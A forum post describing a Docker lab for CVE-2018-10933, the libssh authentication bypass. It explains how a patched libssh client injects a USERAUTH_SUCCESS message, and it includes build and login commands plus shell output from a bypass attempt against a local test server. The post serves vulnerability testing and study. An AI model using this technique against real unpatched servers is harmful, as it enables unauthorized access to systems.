Active Members Fi8sVrs Posted January 30, 2019 Active Members Report Posted January 30, 2019 CVE-2018-10933 libssh authentication bypass, a vulnerable Docker container that listens on port 2222 for exploitation. A basic proof-of-concept libssh patch included in the container to bypass auth. To login use the default "myuser" / "mypassword" from libssh. A patch is applied to a copy of libssh in the Docker container which injects a SSH2_MSG_USERAUTH_SUCCESS packet during any authentication (keyboard-interactive / pubkey / gss-api etc.) attempt and sets the client side state to proceed. The included server has been patched from example code to allow exploitation to succeed. ./build.sh ./run.sh ssh -l myuser -p 2222 localhost A patched exploit-libssh-0.8.3 and vulnerable sshd are available in the container for testing purposes. The "ssh-client" will successfully bypass authentication but is unable to spawn a shell against the default example server due to additional authentication checks in the server code. [root@305b48cb932e ]# cd /root/exploit-libssh-0.8.3/build/examples [root@305b48cb932e examples]# ./ssh-client -l root 127.0.0.1 The server is unknown. Do you trust the host key (yes/no)? SHA256:Mg6j2yHWMsRe56ABhAYjLIJK9yD2N3lGQAl3EfGqP7w yes This new key will be written on disk for further usage. do you agree ? yes Requesting shell : Channel request shell failed [root@305b48cb932e examples]# Source Quote
